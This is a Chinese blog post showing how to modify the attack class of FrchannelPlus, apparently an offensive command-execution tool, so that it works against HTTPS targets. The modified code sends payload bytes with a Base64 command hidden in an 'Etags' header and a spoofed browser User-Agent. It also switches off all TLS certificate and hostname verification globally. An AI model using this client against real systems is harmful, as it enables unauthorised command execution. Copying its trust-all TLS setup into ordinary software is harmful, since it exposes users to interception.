执行命令显示 sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
下载工具源码 https://github.com/BambiZombie/FrchannelPlus
修改代码
在 attack 类中修复 SSL 证书验证错误,修改src/main/java/com/example/frchannel/attack.java的代码如下
package com.example.frchannel;
import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.ssl.NoopHostnameVerifier;
import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
import org.apache.http.conn.ssl.TrustSelfSignedStrategy;
import org.apache.http.entity.ByteArrayEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.ssl.SSLContextBuilder;
import org.apache.http.util.EntityUtils;
import javax.net.ssl.*;
import java.security.cert.X509Certificate;
import java.util.Base64;
public class attack {
public attack() throws Exception{
}
// 静态初始化全局不验证SSL
static {
disableSSLVerification();
}
private static void disableSSLVerification() {
try {
// 创建信任所有证书的TrustManager
TrustManager[] trustAllCerts = new TrustManager[] {
new X509TrustManager() {
public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];
}
public void checkClientTrusted(X509Certificate[] certs, String authType) {}
public void checkServerTrusted(X509Certificate[] certs, String authType) {}
}
};
// 设置全局SSLContext
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, trustAllCerts, new java.security.SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
HttpsURLConnection.setDefaultHostnameVerifier((hostname, session) -> true);
// 确保Apache HttpClient也使用相同的设置
SSLContext.setDefault(sc);
} catch (Exception e) {
e.printStackTrace();
}
}
public static String send(String url, byte[] bytes, String cmd, HttpHost proxy) throws Exception {
CloseableHttpClient httpClient;
// 统一使用不验证SSL的客户端
SSLContext sslContext = SSLContextBuilder.create()
.loadTrustMaterial((chain, authType) -> true) // 信任所有证书
.build();
HttpClientBuilder clientBuilder = HttpClients.custom()
.setSSLContext(sslContext)
.setSSLHostnameVerifier(NoopHostnameVerifier.INSTANCE);
if (proxy != null) {
clientBuilder.setProxy(proxy);
}
httpClient = clientBuilder.build();
HttpPost httpPost = new HttpPost(url);
httpPost.setEntity(new ByteArrayEntity(bytes));
RequestConfig config = RequestConfig.custom()
.setSocketTimeout(10000)
.setConnectTimeout(10000)
.setProxy(proxy)
.build();
httpPost.setConfig(config);
httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36");
httpPost.setHeader("Content-Type", "gzip");
if (cmd != null) {
httpPost.setHeader("Etags", Base64.getEncoder().encodeToString(cmd.getBytes()));
}
try {
HttpResponse response = httpClient.execute(httpPost);
return EntityUtils.toString(response.getEntity());
} finally {
httpClient.close();
}
}
}关键改进点:
-
全局SSL验证禁用(静态初始化块)
-
在类加载时就禁用SSL验证
-
同时设置了
HttpsURLConnection和SSLContext的默认值
-
-
简化HTTP客户端创建
-
移除了HTTPS/HTTP的条件判断
-
统一使用不验证证书的配置
-
打包为jar包
idea 配置
修改 pom.xml
添加 lib
配置 Artifacts
配置完成后通过 Build Artifacts 生成 jar 包
测试程序
运行打包后的程序,可以正常访问,可以绕过证书验证
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
